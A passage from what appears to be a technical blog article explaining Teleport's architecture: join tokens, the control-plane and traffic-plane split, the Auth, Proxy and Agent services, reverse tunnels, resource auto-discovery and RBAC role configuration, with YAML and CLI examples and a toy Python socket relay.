&lt;p&gt;&lt;strong&gt;Join Process:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Token Generation&lt;/strong&gt;: Admin creates a join token via the Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Token Types&lt;/strong&gt;: 

&lt;ul&gt;
&lt;li&gt;Static tokens (for testing/development)&lt;/li&gt;
&lt;li&gt;Dynamic tokens (one-time use, expire after period)&lt;/li&gt;
&lt;li&gt;Provisioning tokens (AWS IAM, Azure AD, GCP identity)&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secure Bootstrap&lt;/strong&gt;: Node uses token to prove its identity to Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CA Pinning&lt;/strong&gt;: Node receives and pins the cluster CA public key&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Certificate Issuance&lt;/strong&gt;: Auth Service issues node certificate after successful validation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Continuous Identity&lt;/strong&gt;: Node uses certificate for all subsequent cluster interactions&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Security Considerations:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Join tokens should be treated as highly sensitive credentials&lt;/li&gt;
&lt;li&gt;Use dynamic, short-lived tokens in production&lt;/li&gt;
&lt;li&gt;Leverage cloud provider identity (IAM roles) for automated, secure joins&lt;/li&gt;
&lt;li&gt;Monitor join events in audit logs&lt;/li&gt;
&lt;li&gt;Rotate join tokens regularly&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This secure enrollment process ensures that even before certificate-based authentication begins, nodes have established verifiable trust with the cluster, eliminating the trust-on-first-use problem entirely.&lt;/p&gt;
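&lt;p&gt;A dynamic join token can be expressed as a cluster resource. The sketch below is illustrative; the name and expiry are placeholders, and the real token value must be treated as a secret:&lt;/p&gt;

```yaml
kind: token
version: v2
metadata:
  name: example-node-token          # placeholder; the real value is a credential
  expires: "2026-01-01T00:15:00Z"   # a short window bounds the enrollment risk
spec:
  roles: [Node]                     # what the joining service is allowed to become
  join_method: token
```

In practice you would typically generate such a token with something like &lt;code&gt;tctl tokens add --type=node --ttl=15m&lt;/code&gt; rather than writing the resource by hand.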


&lt;h2&gt;
  
  
  Teleport Architecture Deep Dive
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Control Plane vs Traffic Plane Separation
&lt;/h3&gt;

&lt;p&gt;Teleport separates &lt;strong&gt;authority and policy decisions&lt;/strong&gt; from &lt;strong&gt;session traffic handling&lt;/strong&gt;:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Control Plane (Authority &amp;amp; State):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Auth Service: Certificate issuance, identity management, RBAC, policy evaluation&lt;/li&gt;
&lt;li&gt;Backend storage: Cluster state, audit logs, session metadata&lt;/li&gt;
&lt;li&gt;Management operations: User, role, and policy configuration&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Traffic Plane (Session Path):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxy Service: Public gateway, client termination, policy enforcement, session routing and recording&lt;/li&gt;
&lt;li&gt;Teleport Agents: Protocol-specific access to infrastructure resources&lt;/li&gt;
&lt;li&gt;Session data: Live SSH, Kubernetes, database, application, and desktop traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The Auth Service never handles interactive traffic directly. All live sessions flow through the Proxy and Agents, using short-lived certificates issued by the Auth Service.&lt;/p&gt;
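&lt;p&gt;This separation shows up directly in deployment configuration: a proxy node runs with the auth role disabled and points at the control plane. A minimal, illustrative &lt;code&gt;teleport.yaml&lt;/code&gt; for such a node (all hostnames are placeholders) might look like:&lt;/p&gt;

```yaml
# Proxy-only node: traffic plane only, no authority state
teleport:
  auth_server: "auth.internal.example.com:3025"  # control-plane endpoint (placeholder)
auth_service:
  enabled: false        # this node holds no CA keys and issues nothing
proxy_service:
  enabled: true
  public_addr: "teleport.example.com:443"        # the only publicly exposed endpoint
ssh_service:
  enabled: false
```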


&lt;h3&gt;
  
  
  Core Components
&lt;/h3&gt;

&lt;p&gt;Teleport's architecture consists of three main components that work together to provide secure infrastructure access:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhou0bfrjm12z2nigfj9x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhou0bfrjm12z2nigfj9x.png" alt="image" width="800" height="360"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  1. Auth Service: The Certificate Authority
&lt;/h3&gt;

&lt;p&gt;The Auth Service is the brain of a Teleport cluster. It performs three critical functions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Certificate Authority Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Maintains multiple internal certificate authorities for different purposes (host CA, user CA, database CA, etc.)&lt;/li&gt;
&lt;li&gt;Signs certificates for users and services joining the cluster&lt;/li&gt;
&lt;li&gt;Performs certificate rotation to invalidate old certificates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Identity and Access Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Integrates with SSO providers (Okta, GitHub, Google Workspace, Active Directory)&lt;/li&gt;
&lt;li&gt;Manages local users and roles&lt;/li&gt;
&lt;li&gt;Enforces Role-Based Access Control (RBAC)&lt;/li&gt;
&lt;li&gt;Issues temporary access through Access Requests&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Audit and Compliance:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Collects audit events from all cluster components&lt;/li&gt;
&lt;li&gt;Coordinates session recording storage&lt;/li&gt;
&lt;li&gt;Maintains comprehensive audit logs of all access and actions&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnj7kqcpk142xu1uuety9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fnj7kqcpk142xu1uuety9.png" alt="image" width="800" height="276"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Backend Storage Options:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;The Auth Service uses pluggable backend storage for cluster state and audit data:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;DynamoDB + S3&lt;/strong&gt;: AWS-native option (state in DynamoDB, recordings/logs in S3)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;PostgreSQL&lt;/strong&gt;: Self-hosted relational database option&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;etcd&lt;/strong&gt;: High-availability key-value store&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Firestore&lt;/strong&gt;: Used by Teleport Cloud&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Choose based on your infrastructure, performance requirements, and operational preferences.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In practice:&lt;/strong&gt; DynamoDB + S3 is the most operationally scalable choice on AWS — it offloads capacity management and delivers predictable performance at scale. PostgreSQL is preferred for portability and on-prem deployments, but requires careful tuning (connection pooling, vacuuming, index maintenance) at scale. etcd is generally only appropriate if you're already operating it for Kubernetes and want a unified store for small deployments. Firestore is used by Teleport Cloud.&lt;/p&gt;
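&lt;p&gt;For the AWS-native option, the &lt;code&gt;storage&lt;/code&gt; section of the Auth Service's &lt;code&gt;teleport.yaml&lt;/code&gt; looks roughly like this (table and bucket names are placeholders):&lt;/p&gt;

```yaml
teleport:
  storage:
    type: dynamodb
    region: us-east-1
    table_name: teleport-cluster-state              # cluster state (placeholder name)
    audit_events_uri: ["dynamodb://teleport-audit-events"]
    audit_sessions_uri: "s3://example-bucket/session-recordings"
```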


&lt;h3&gt;
  
  
  2. Proxy Service: The Access Gateway
&lt;/h3&gt;

&lt;p&gt;The Proxy Service is the public-facing component that users and clients interact with. It serves as the gateway into the Teleport cluster.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key Responsibilities:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Public Access Point:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides HTTPS endpoint for web UI and API&lt;/li&gt;
&lt;li&gt;Terminates TLS connections&lt;/li&gt;
&lt;li&gt;Serves as single point of entry for all access&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Connection Routing:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Maintains reverse tunnel connections from all agents&lt;/li&gt;
&lt;li&gt;Routes user connections to appropriate backend resources&lt;/li&gt;
&lt;li&gt;Load balances across multiple agent instances&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Session Management:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Proxies SSH, Kubernetes, database, and application protocols&lt;/li&gt;
&lt;li&gt;Coordinates session recording&lt;/li&gt;
&lt;li&gt;Manages concurrent session limits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Web Interface:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Hosts web-based terminal and management UI&lt;/li&gt;
&lt;li&gt;Provides resource discovery and selection&lt;/li&gt;
&lt;li&gt;Displays audit logs and session recordings&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwrapuw1xmzsf15z3a2a.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdwrapuw1xmzsf15z3a2a.png" alt="image" width="800" height="546"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why Reverse Tunnels?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Traditional architectures require opening inbound firewall rules to resources. Teleport's reverse tunnel approach means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;No Inbound Firewall Rules&lt;/strong&gt;: Agents connect outbound to Proxy&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;NAT Traversal&lt;/strong&gt;: Works behind NAT and restrictive firewalls&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Private Network Access&lt;/strong&gt;: Reach resources in private subnets without VPN&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Simplified Security&lt;/strong&gt;: Only Proxy needs public IP and open ports&lt;/li&gt;
&lt;/ul&gt;
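&lt;p&gt;The dial-out mechanics can be sketched in a few dozen lines: a toy "proxy" is the only listener the outside world sees, while the "agent" dials &lt;em&gt;out&lt;/em&gt; to it and relays traffic to a private resource. This is a single-request illustration of the idea only; real Teleport multiplexes many sessions over mutually authenticated TLS tunnels, and every port and name here is made up.&lt;/p&gt;

```python
import socket
import threading

def run_resource(port, ready):
    """A private 'resource' (echo server) that is never exposed publicly."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    ready.set()
    conn, _ = srv.accept()
    conn.sendall(b"echo:" + conn.recv(1024))
    conn.close()

def run_proxy(tunnel_port, client_port, ready):
    """The proxy is the only inbound listener: agents and clients both dial it."""
    tsrv = socket.socket()
    tsrv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    tsrv.bind(("127.0.0.1", tunnel_port))
    tsrv.listen(1)
    csrv = socket.socket()
    csrv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    csrv.bind(("127.0.0.1", client_port))
    csrv.listen(1)
    ready.set()
    tunnel, _ = tsrv.accept()          # the agent dialed out to us
    client, _ = csrv.accept()          # a user connected to the proxy
    tunnel.sendall(client.recv(1024))  # relay the request over the tunnel
    client.sendall(tunnel.recv(1024))  # relay the reply back to the user

def run_agent(tunnel_port, resource_port):
    """The agent makes only *outbound* connections: no inbound firewall rules."""
    tunnel = socket.create_connection(("127.0.0.1", tunnel_port))
    request = tunnel.recv(1024)        # wait for relayed client traffic
    backend = socket.create_connection(("127.0.0.1", resource_port))
    backend.sendall(request)
    tunnel.sendall(backend.recv(1024)) # send the resource's reply back
```

Note that the resource's network never accepts a connection from outside; everything it serves arrives via the agent's outbound tunnel.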


&lt;h3&gt;
  
  
  3. Teleport Agents: Protocol-Specific Services
&lt;/h3&gt;

&lt;p&gt;Agents run alongside infrastructure resources and handle protocol-specific access. Each agent type specializes in a particular protocol or resource type.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Agent Types:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SSH Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides SSH access to Linux/Unix servers&lt;/li&gt;
&lt;li&gt;Provides an SSH proxy service that supports OpenSSH clients and Teleport-issued certificates&lt;/li&gt;
&lt;li&gt;Supports standard SSH features (port forwarding, SCP, SFTP)&lt;/li&gt;
&lt;li&gt;Records session activity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Kubernetes Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to Kubernetes clusters&lt;/li&gt;
&lt;li&gt;Proxies kubectl commands and API requests&lt;/li&gt;
&lt;li&gt;Enforces Kubernetes RBAC alongside Teleport RBAC&lt;/li&gt;
&lt;li&gt;Audits all Kubernetes API calls&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Database Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to databases (PostgreSQL, MySQL, MongoDB, etc.)&lt;/li&gt;
&lt;li&gt;Issues short-lived database credentials&lt;/li&gt;
&lt;li&gt;Audits database access sessions and connection metadata. Query-level visibility is &lt;strong&gt;engine-dependent&lt;/strong&gt; — some engines support query capture natively, others require additional configuration or native database auditing alongside Teleport.&lt;/li&gt;
&lt;li&gt;Supports secure proxying and connection multiplexing&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Application Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides access to internal web applications&lt;/li&gt;
&lt;li&gt;Handles HTTP/HTTPS proxying&lt;/li&gt;
&lt;li&gt;Supports header-based authentication&lt;/li&gt;
&lt;li&gt;Enables access to web apps without VPN&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Desktop Service:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Provides RDP access to Windows machines&lt;/li&gt;
&lt;li&gt;Records desktop sessions&lt;/li&gt;
&lt;li&gt;Supports clipboard and file transfer&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1an6sjlg7gws0o9ml6vu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1an6sjlg7gws0o9ml6vu.png" alt="image" width="800" height="166"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Multi-Service Agents:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A single agent process can run multiple services simultaneously:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Agent running SSH, DB, and App services&lt;/span&gt;
&lt;span class="na"&gt;teleport&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;auth_token&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;xyz789"&lt;/span&gt;
  &lt;span class="na"&gt;proxy_server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;proxy.example.com:443"&lt;/span&gt;

&lt;span class="na"&gt;ssh_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;

&lt;span class="na"&gt;db_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;databases&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;prod-postgres"&lt;/span&gt;
    &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;postgres"&lt;/span&gt;
    &lt;span class="na"&gt;uri&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;postgres.internal:5432"&lt;/span&gt;

&lt;span class="na"&gt;app_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;apps&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;internal-dashboard"&lt;/span&gt;
    &lt;span class="na"&gt;uri&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;http://localhost:8080"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;




&lt;h3&gt;
  
  
  Unified Resource Inventory and Discovery
&lt;/h3&gt;

&lt;p&gt;Teleport maintains a dynamic inventory of all infrastructure resources across the cluster. This provides a centralized catalog of what exists and what users can access.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resource Catalog Features:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Automatic Discovery&lt;/strong&gt;: Agents can auto-discover resources (EC2 instances, RDS databases, EKS clusters)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Labeling&lt;/strong&gt;: Resources tagged with metadata for RBAC matching&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Real-time Status&lt;/strong&gt;: Live view of resource availability and health&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Search and Filter&lt;/strong&gt;: Find resources by labels, names, or types&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Access Visibility&lt;/strong&gt;: Shows which resources a user can access based on their roles&lt;/li&gt;
&lt;/ul&gt;
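
&lt;p&gt;The inventory is searchable from the CLI as well as the web UI. A minimal sketch, assuming a logged-in &lt;code&gt;tsh&lt;/code&gt; session (label values are illustrative; exact flags vary by Teleport version):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# List SSH nodes, filtered by label&lt;/span&gt;
tsh ls env=production team=backend

&lt;span class="c"&gt;# List registered databases and Kubernetes clusters&lt;/span&gt;
tsh db ls
tsh kube ls
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;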

&lt;p&gt;&lt;strong&gt;Auto-Discovery Example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# Database service with auto-discovery&lt;/span&gt;
&lt;span class="na"&gt;db_service&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;enabled&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
  &lt;span class="na"&gt;aws&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;types&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rds"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;aurora"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;regions&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us-west-2"&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us-east-1"&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;tags&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;env"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;production"&lt;/span&gt;
      &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;teleport"&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s2"&gt;"&lt;/span&gt;&lt;span class="s"&gt;enabled"&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This makes Teleport not just an access platform but also an infrastructure-visibility tool, automatically maintaining an up-to-date inventory without manual configuration.&lt;/p&gt;


&lt;h2&gt;
  
  
  Advanced Features
&lt;/h2&gt;


&lt;h3&gt;
  
  
  Role-Based Access Control (RBAC)
&lt;/h3&gt;

&lt;p&gt;RBAC in Teleport determines what resources users can access and what actions they can perform. Roles are the central policy mechanism.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Role Structure:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;role&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;backend-developer&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;options&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Certificate TTL - configurable based on security requirements&lt;/span&gt;
    &lt;span class="na"&gt;max_session_ttl&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;8h&lt;/span&gt;

  &lt;span class="na"&gt;allow&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="c1"&gt;# Which resources can be accessed&lt;/span&gt;
    &lt;span class="na"&gt;logins&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ubuntu'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;ec2-user'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Label-based access control&lt;/span&gt;
    &lt;span class="na"&gt;node_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;staging'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;team'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;backend'&lt;/span&gt;

    &lt;span class="c1"&gt;# Database access&lt;/span&gt;
    &lt;span class="na"&gt;db_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;staging'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;db_names&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;analytics'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;app_db'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;db_users&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;readonly'&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;app_user'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;

    &lt;span class="c1"&gt;# Kubernetes access&lt;/span&gt;
    &lt;span class="na"&gt;kubernetes_groups&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;developers'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
    &lt;span class="na"&gt;kubernetes_labels&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;env'&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev'&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Label-Based Access:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Resources are labeled, and roles specify which labels grant access. This creates dynamic access policies that automatically apply to new resources:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
